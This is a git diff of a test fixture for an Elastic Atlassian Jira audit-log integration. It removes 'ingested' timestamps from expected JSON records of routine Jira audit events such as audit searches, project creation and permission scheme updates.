diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index a683390cf18..2fe8055d2d6 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -37,7 +37,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924698307Z", "original": "{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", "type": "info", "kind": "event" 
@@ -119,7 +118,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924702210Z", "original": "{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", "type": "info", "kind": "event" 
@@ -189,7 +187,6 @@ }, "event": { "action": "personal.access.tokens.audit.log.summary.token.created", - "ingested": "2021-12-24T00:58:01.924703274Z", "original": "{\"timestamp\":\"2021-11-22T00:34:23.154Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"personal.access.tokens.audit.log.category\",\"category\":\"Security\",\"actionI18nKey\":\"personal.access.tokens.audit.log.summary.token.created\",\"action\":\"Personal access token created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"User\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"personal.access.tokens.audit.log.extra.attribute.name\",\"name\":\"Token Name\",\"value\":\"asdf\"}]}", "type": [ "admin", 
@@ -259,7 +256,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924704183Z", "original": "{\"timestamp\":\"2021-11-22T00:32:20.234Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z\"}]}", "type": "info", "kind": "event" 
@@ -329,7 +325,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924705061Z", "original": "{\"timestamp\":\"2021-11-22T00:31:52.991Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"41 - 90\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z\"}]}", "type": "info", "kind": "event" 
@@ -399,7 +394,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924705951Z", "original": "{\"timestamp\":\"2021-11-22T00:31:37.412Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"69 - 78\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.227Z - 2021-11-22T00:08:34.249Z\"}]}", "type": "info", "kind": "event" 
@@ -469,7 +463,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924706831Z", "original": "{\"timestamp\":\"2021-11-22T00:31:26.455Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 88\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.266Z - 2021-11-22T00:30:59.449Z\"}]}", "type": "info", "kind": "event" 
@@ -539,7 +532,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924707718Z", "original": "{\"timestamp\":\"2021-11-22T00:30:59.449Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:26:03.206Z\"}]}", "type": "info", "kind": "event" 
@@ -609,7 +601,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924708589Z", "original": "{\"timestamp\":\"2021-11-22T00:26:03.206Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:12:02.856Z\"}]}", "type": "info", "kind": "event" 
@@ -679,7 +670,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924709515Z", "original": "{\"timestamp\":\"2021-11-22T00:12:02.856Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"}]}", "type": "info", "kind": "event" 
@@ -749,7 +739,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924710381Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.545Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 3.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10002\",\"id\":\"10002\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 3.0\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -819,7 +808,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924711450Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.543Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 2.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10001\",\"id\":\"10001\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 2.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-28\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -894,7 +882,6 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-24T00:58:01.924712412Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.released\",\"action\":\"Project version released\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -957,7 +944,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924713282Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.521Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 1.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-14\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1032,7 +1018,6 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-24T00:58:01.924714177Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.506Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"action\":\"Project roles changed\"},\"affectedObjects\":[{\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\",\"id\":\"10100\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Users\",\"i18nKey\":\"admin.common.words.users\",\"to\":\"JIRAUSER10000\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1101,7 +1086,6 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-24T00:58:01.924715073Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.297Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.created\",\"action\":\"Project created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Default Assignee\",\"i18nKey\":\"admin.projects.default.assignee\",\"to\":\"Unassigned\"},{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"to\":\"\"},{\"key\":\"Key\",\"i18nKey\":\"common.words.key\",\"to\":\"TEST\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"test\"},{\"key\":\"Project Lead\",\"i18nKey\":\"common.concepts.projectlead\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" 
@@ -1195,7 +1179,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-24T00:58:01.924716064Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.266Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"action\":\"Permission scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1258,7 +1241,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-24T00:58:01.924718648Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.249Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"action\":\"Permission scheme removed from project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "deletion" 
@@ -1327,7 +1309,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924719521Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.243Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1396,7 +1377,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924720383Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.241Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Start/Complete Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1465,7 +1445,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924721249Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.239Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1534,7 +1513,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924722111Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.236Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Development Tools\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1603,7 +1581,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924723033Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.235Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Transition Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1672,7 +1649,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924724115Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.233Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Read-Only 